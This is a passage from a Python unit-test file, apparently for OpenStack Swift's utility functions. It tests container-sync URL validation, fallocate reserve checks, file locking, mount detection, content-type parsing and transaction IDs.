self.assertEqual(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
fname = 'container-sync-realms.conf'
fcontents = '''
[US]
key = 9ff3b71c849749dbaec4ccdd3cbab62b
cluster_dfw1 = http://dfw1.host/v1/
'''
with temptree([fname], [fcontents]) as tempdir:
logger = FakeLogger()
fpath = os.path.join(tempdir, fname)
csr = ContainerSyncRealms(fpath, logger)
for realms_conf in (None, csr):
for goodurl, result in (
('http://1.1.1.1/v1/a/c',
(None, 'http://1.1.1.1/v1/a/c', None, None)),
('http://1.1.1.1:8080/a/c',
(None, 'http://1.1.1.1:8080/a/c', None, None)),
('http://2.2.2.2/a/c',
(None, 'http://2.2.2.2/a/c', None, None)),
('https://1.1.1.1/v1/a/c',
(None, 'https://1.1.1.1/v1/a/c', None, None)),
('//US/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/dfw1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//',
(None, None, None, None)),
('',
(None, None, None, None))):
if goodurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
for badurl, result in (
('http://1.1.1.1',
('Path required in X-Container-Sync-To', None, None,
None)),
('httpq://1.1.1.1/v1/a/c',
('Invalid scheme \'httpq\' in X-Container-Sync-To, '
'must be "//", "http", or "https".', None, None,
None)),
('http://1.1.1.1/v1/a/c?query',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.2/v1/a/c',
("Invalid host '1.1.1.2' in X-Container-Sync-To",
None, None, None)),
('//us/invalid/a/c',
("No cluster endpoint for 'us' 'invalid'", None,
None, None)),
('//invalid/dfw1/a/c',
("No realm key for 'invalid'", None, None, None)),
('//us/invalid1/a/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a/'", None, None, None)),
('//us/invalid1/a',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a'", None, None, None)),
('//us/invalid1/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/'", None, None, None)),
('//us/invalid1',
("Invalid X-Container-Sync-To format "
"'//us/invalid1'", None, None, None)),
('//us/',
("Invalid X-Container-Sync-To format "
"'//us/'", None, None, None)),
('//us',
("Invalid X-Container-Sync-To format "
"'//us'", None, None, None))):
if badurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEqual(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEqual(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
expected_sizes = {1: 1,
2: 1,
3: 2,
4: 2,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_majority_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.majority_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_rsync_module_interpolation(self):
fake_device = {'ip': '127.0.0.1', 'port': 11,
'replication_ip': '127.0.0.2', 'replication_port': 12,
'region': '1', 'zone': '2', 'device': 'sda1',
'meta': 'just_a_string'}
self.assertEqual(
utils.rsync_module_interpolation('{ip}', fake_device),
'127.0.0.1')
self.assertEqual(
utils.rsync_module_interpolation('{port}', fake_device),
'11')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}', fake_device),
'127.0.0.2')
self.assertEqual(
utils.rsync_module_interpolation('{replication_port}',
fake_device),
'12')
self.assertEqual(
utils.rsync_module_interpolation('{region}', fake_device),
'1')
self.assertEqual(
utils.rsync_module_interpolation('{zone}', fake_device),
'2')
self.assertEqual(
utils.rsync_module_interpolation('{device}', fake_device),
'sda1')
self.assertEqual(
utils.rsync_module_interpolation('{meta}', fake_device),
'just_a_string')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}::object',
fake_device),
'127.0.0.2::object')
self.assertEqual(
utils.rsync_module_interpolation('{ip}::container{port}',
fake_device),
'127.0.0.1::container11')
self.assertEqual(
utils.rsync_module_interpolation(
'{replication_ip}::object_{device}', fake_device),
'127.0.0.2::object_sda1')
self.assertEqual(
utils.rsync_module_interpolation(
'127.0.0.3::object_{replication_port}', fake_device),
'127.0.0.3::object_12')
self.assertRaises(ValueError, utils.rsync_module_interpolation,
'{replication_ip}::object_{deivce}', fake_device)
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
f_blocks = 100
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Make sure setting noop, which disables fallocate, also stops the
# fallocate_reserve check.
# Set the fallocate_reserve to 99% and request an object that is
# about 50% the size. With fallocate_reserve off this will succeed.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('99%')
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(500)), 0)
# Setting noop to False after the constructor allows us to use
# a noop fallocate syscall and still test fallocate_reserve.
fallocate.noop = False
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1023')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1023')
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1024')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1024')
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2048')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 2048'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2048')
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1024 <= 2048'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1023')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(1))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 1023 <= 1023'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1022')
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1% reserved, have 100 bytes * 2/100 free, and file size is
# 99, so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 2
StatVFS.f_blocks = 100
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(99)), 0)
# Want 2% reserved, have 50 bytes * 2/50 free, and file size is 49,
# so succeeds
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2%')
StatVFS.f_frsize = 50
StatVFS.f_bavail = 2
StatVFS.f_blocks = 50
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(49)), 0)
# Want 100% reserved, have 100 * 100/100 free, and file size is 0,
# so fails.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('100%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 100
StatVFS.f_blocks = 100
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(0))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 100.0 <= 100.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 1% reserved, have 100 * 2/100 free, and file size is 101,
# so fails.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('1%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 2
StatVFS.f_blocks = 100
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(101))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 0.99 <= 1.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# is 100, so fails
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('98%')
StatVFS.f_frsize = 100
StatVFS.f_bavail = 99
StatVFS.f_blocks = 100
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(100))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 98.0 <= 98.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
# Want 2% reserved, have 1000 bytes * 21/1000 free, and file size
# is 999, so succeeds.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2%')
StatVFS.f_frsize = 1000
StatVFS.f_bavail = 21
StatVFS.f_blocks = 1000
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(999)), 0)
# Want 2% resereved, have 1000 bytes * 21/1000 free, and file size
# is 1000, so fails.
utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \
utils.config_fallocate_value('2%')
StatVFS.f_frsize = 1000
StatVFS.f_bavail = 21
StatVFS.f_blocks = 1000
with self.assertRaises(OSError) as catcher:
fallocate(0, 1, 0, ctypes.c_uint64(1000))
self.assertEqual(
str(catcher.exception),
'[Errno %d] FALLOCATE_RESERVE fail 2.0 <= 2.0'
% errno.ENOSPC)
self.assertEqual(catcher.exception.errno, errno.ENOSPC)
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEqual(len(trans_id), 34)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEqual(len(trans_id), 41)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[34:], '-suffix')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEqual(ts, None)
def test_config_fallocate_value(self):
fallocate_value, is_percent = utils.config_fallocate_value('10%')
self.assertEqual(fallocate_value, 10)
self.assertTrue(is_percent)
fallocate_value, is_percent = utils.config_fallocate_value('10')
self.assertEqual(fallocate_value, 10)
self.assertFalse(is_percent)
try:
fallocate_value, is_percent = utils.config_fallocate_value('ab%')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: ab% is an invalid value for '
'fallocate_reserve.')
try:
fallocate_value, is_percent = utils.config_fallocate_value('ab')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: ab is an invalid value for '
'fallocate_reserve.')
try:
fallocate_value, is_percent = utils.config_fallocate_value('1%%')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: 1%% is an invalid value for '
'fallocate_reserve.')
try:
fallocate_value, is_percent = utils.config_fallocate_value('10.0')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: 10.0 is an invalid value for '
'fallocate_reserve.')
fallocate_value, is_percent = utils.config_fallocate_value('10.5%')
self.assertEqual(fallocate_value, 10.5)
self.assertTrue(is_percent)
fallocate_value, is_percent = utils.config_fallocate_value('10.000%')
self.assertEqual(fallocate_value, 10.000)
self.assertTrue(is_percent)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
f.seek(0)
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_lock_file_unlinked_after_open(self):
os_open = os.open
first_pass = [True]
def deleting_open(filename, flags):
# unlink the file after it's opened. once.
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', deleting_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
first_pass = [True]
def recreating_open(filename, flags):
# unlink and recreate the file after it's opened
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
os.close(os_open(filename, os.O_CREAT | os.O_RDWR))
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', recreating_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
def test_lock_file_held_on_unlink(self):
os_unlink = os.unlink
def flocking_unlink(filename):
# make sure the lock is held when we unlink
fd = os.open(filename, os.O_RDWR)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
os.close(fd)
os_unlink(filename)
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.unlink', flocking_unlink):
with utils.lock_file(nt.name, unlink=True):
pass
def test_lock_file_no_unlink_if_fail(self):
os_open = os.open
with NamedTemporaryFile(delete=True) as nt:
def lock_on_open(filename, flags):
# lock the file on another fd after it's opened.
fd = os_open(filename, flags)
fd2 = os_open(filename, flags)
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
return fd
try:
timedout = False
with mock.patch('os.open', lock_on_open):
with utils.lock_file(nt.name, unlink=False, timeout=0.01):
pass
except LockTimeout:
timedout = True
self.assertTrue(timedout)
self.assertTrue(os.path.exists(nt.name))
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEqual(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 15)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 1234)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
def test_extract_swift_bytes(self):
scenarios = {
# maps input value -> expected returned tuple
'': ('', None),
'text/plain': ('text/plain', None),
'text/plain; other=thing': ('text/plain;other=thing', None),
'text/plain; swift_bytes=123': ('text/plain', '123'),
'text/plain; other=thing;swift_bytes=123':
('text/plain;other=thing', '123'),
'text/plain; swift_bytes=123; other=thing':
('text/plain;other=thing', '123'),
'text/plain; swift_bytes=123; swift_bytes=456':
('text/plain', '456'),
'text/plain; swift_bytes=123; other=thing;swift_bytes=456':
('text/plain;other=thing', '456')}
for test_value, expected in scenarios.items():
self.assertEqual(expected, utils.extract_swift_bytes(test_value))
def test_clean_content_type(self):
subtests = {
'': '', 'text/plain': 'text/plain',
'text/plain; someother=thing': 'text/plain; someother=thing',
'text/plain; swift_bytes=123': 'text/plain',
'text/plain; someother=thing; swift_bytes=123':
'text/plain; someother=thing',
# Since Swift always tacks on the swift_bytes, clean_content_type()
# only strips swift_bytes if it's last. The next item simply shows
# that if for some other odd reason it's not last,
# clean_content_type() will not remove it from the header.
'text/plain; swift_bytes=123; someother=thing':
'text/plain; swift_bytes=123; someother=thing'}
for before, after in subtests.items():
self.assertEqual(utils.clean_content_type(before), after)
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEqual('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
def test_get_hmac(self):
self.assertEqual(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
def test_get_policy_index(self):
# Account has no information about a policy
req = Request.blank(
'/sda1/p/a',
environ={'REQUEST_METHOD': 'GET'})
res = Response()
self.assertIsNone(utils.get_policy_index(req.headers,
res.headers))
# The policy of a container can be specified by the response header
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'})
res = Response(headers={'X-Backend-Storage-Policy-Index': '1'})
self.assertEqual('1', utils.get_policy_index(req.headers,
res.headers))
# The policy of an object to be created can be specified by the request
# header
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Backend-Storage-Policy-Index': '2'})
res = Response()
self.assertEqual('2', utils.get_policy_index(req.headers,
res.headers))
def test_get_log_line(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
res = Response()
trans_time = 1.2
additional_info = 'some information'
server_pid = 1234
exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \
'/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -'
with mock.patch(
'time.gmtime',
mock.MagicMock(side_effect=[time.gmtime(10001.0)])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=server_pid)):
self.assertEqual(
exp_line,
utils.get_log_line(req, res, trans_time, additional_info))
def test_cache_from_env(self):
